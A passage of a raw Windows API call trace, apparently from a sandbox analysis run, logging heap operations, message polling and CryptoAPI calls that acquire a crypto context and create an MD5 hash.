hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0141.931] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0141.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0141.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0141.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0141.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0141.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0141.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0141.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0141.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0141.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0141.932] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0141.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0141.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0141.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0141.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0141.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0141.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0141.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0141.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0141.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0141.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0141.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0141.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0141.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0141.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0141.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0141.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0141.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0141.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0141.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0141.936] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0141.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0141.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0141.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0141.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0141.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0141.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0141.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0141.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0141.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0141.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0141.937] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0141.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0141.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.937] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0141.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0141.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0141.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.939] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0141.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0141.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0141.939] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0141.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0141.940] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0141.940] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.940] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0141.940] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0141.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0141.940] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0141.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0141.940] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0141.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0141.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0141.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0141.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0141.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0141.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0141.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0141.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0141.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0141.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50cb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0141.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0141.942] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0141.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0141.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0141.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0141.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0141.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0141.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0141.943] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0141.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0141.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0141.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0141.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0141.944] RtlAllocateHeap 